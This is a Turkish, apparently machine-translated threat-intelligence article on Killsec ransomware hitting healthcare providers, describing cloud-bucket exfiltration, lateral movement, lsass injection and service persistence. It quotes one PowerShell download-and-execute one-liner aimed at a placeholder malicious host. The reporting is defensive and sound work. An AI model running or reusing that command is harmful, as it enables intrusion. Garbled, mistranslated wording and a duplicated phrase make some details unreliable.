Killsec fidye yazılımı suşu hızla Latin Amerika ve ötesindeki sağlık hizmeti BT altyapılarını hedefleyen zorlu bir tehdit olarak ortaya çıktı.
İlk olarak Eylül 2025’in başlarında gözlemlenen Killsec operatörleri, yüklerini ölçeklendirmeleri için uzlaşmış yazılım tedarik zinciri ilişkilerinden yararlandı.
Birkaç Brezilyalı sağlık hizmeti sağlayıcısı bulut depolama kovalarından kaynaklanan olağandışı ağ trafiği bildirdiğinde ilk uzlaşma göstergeleri tespit edildi.
Karakteristik olarak, bu grup, ilk müdahale karmaşıklığını en aza indirirken etkiyi en üst düzeye çıkararak, sofistike şifreleme rutinleri ile açık AWS S3 kovaları gibi ilkel eksfiltrasyon yöntemlerini birleştirir.
Rezekarlık analistleri, Killsec’in giriş noktasının sıklıkla, her ikisi de hızlı dijital dönüşüm geçiren sağlık ortamlarında yaygın olan yanlış olmayan web uygulamalarını veya yanlış yapılandırılmış bulut depolamasını içerdiğini belirtti.
İçeride, kötü amaçlı yazılım, Windows Uzaktan Yönetimi (WINRM) ve Uzak Masaüstü Protokolü (RDP) dahil olmak üzere meşru idari protokoller aracılığıyla dahili ağlar aracılığıyla yayılır.
.webp)
Bu yanal hareket genellikle günlerce tespit edilmez, rakiplere hassas tıbbi kayıtları ve kişisel olarak tanımlanabilir bilgileri hasat etmek için yeterli zaman verir (PII).
Grubun TOR’daki veri sızıntısı sitesi, yüksek profilli pesfiltrasyonları sergiledi ve kurbanları fidye ödemelerini zorlamak için alenen utanç verme istekliliğini doğruladı.
Uzlaşmanın ardından, Killsec aktörleri, özel olarak inşa edilmiş bir AES-256 şifreleme rutini çağıran hafif bir yükleyici kullanarak çok aşamalı bir şifreleme işlemi yürütür.
Reserlik araştırmacıları, yükleyiciyi benzersiz ithalat karması ve olağandışı manipülasyonu ile tanımladılar. Advapi32.dll Kütüphane, antivirüs sezgisel yöntemlerinin amaçlı kaçınmasını önermektedir.
Meşru sistem API’lerinin ve kendi kendini geliştiren şifreleme bileşenlerinin birleşik kullanımları, geleneksel imza tabanlı tespiti büyük ölçüde etkisiz hale getirerek grubun büyüyen teknik karmaşıklığını vurgulamaktadır.
Görünüşünden itibaren bir hafta içinde Killsec, fidye yazılımı taleplerini tetiklemeden önce ransomware taleplerini tetiklemeden önce, kiralanmamış hasta görüntüleri, laboratuvar sonuçları ve reşit olmayanlarla ilgili kayıtlar da dahil olmak üzere 34 GB’dan fazla veri açığa çıkararak bir düzineden fazla sağlık kuruluşunu etkiledi.
Bu dosyaların görünür kamu sızıntısı, düzenleyicileri Brezilya’nın LGPD çerçevesi kapsamında acil ihlal bildirimleri yayınlamaya itti.
Tehdit istihbarat raporları şimdi, etkilenen yazılımı kullanan aşağı akış kliniklerinin ve laboratuvarların, tehlikeye atılan satıcının kodu imzasız ve doğrulanmamış kalırsa ikincil uzlaşmalarla karşılaşabileceği konusunda uyarıyor.
Enfeksiyon mekanizması derin dalış
Killsec’in başarısının kritik bir yönü, fırsatçı bulut kovası erişimini ortak belge biçimlerine gömülü bir geri dönüş indiricisiyle birleştiren çift uçlu enfeksiyon mekanizmasında yatmaktadır.
Mağdurlar önce bilinen bir tıbbi tedarikçinin faturalandırma ifadesi olarak maskelenen aldatıcı bir PDF fatura dosyasıyla karşılaşırlar.
Bu kötü biçimlendirilmiş PDF, işleme motorundaki sıfır günden yararlanır ve gizli bir PowerShell One-Liner’ın yürütülmesini tetikler:-
powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('hxxp://malicious.example.com/loader.ps1'))"Yürütme üzerine, bu PowerShell saplama kodlanmış bir yükü alır, belleğe kodlar ve AES şifreleme motorunu doğrudan içine yüklemek için yansıtıcı DLL enjeksiyonu kullanır. lsass.exe.
Bu satır içi enjeksiyon, disk tabanlı algılamayı atlar ve adli görünürlüğü uçucu belleğe kısıtlar.
Yükleyici daha sonra ağ paylaşımlarını ve planlanan görevleri numaralandırır ve gizlenmiş bir Windows hizmeti aracılığıyla kalıcılık yaratır WinLevelService. Bu hizmet, her yeniden başlatmada yürütülmeyi sağlayarak sistem hesabı altında çalışacak şekilde yapılandırılmıştır.
Yükleyicisini iyi huylu görünen belgelerde saklayarak ve bulut yanlış yakınlaştırmalarını kötüye kullanarak, Killsec fidye yazılımı operatörleri sağlık hedeflerine karşı yüksek bir başarı oranını koruyarak, proaktif bulut güvenlik duruş yönetimi ve titiz belge dezenfekte protokollerine duyulan ihtiyacı vurguluyor.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free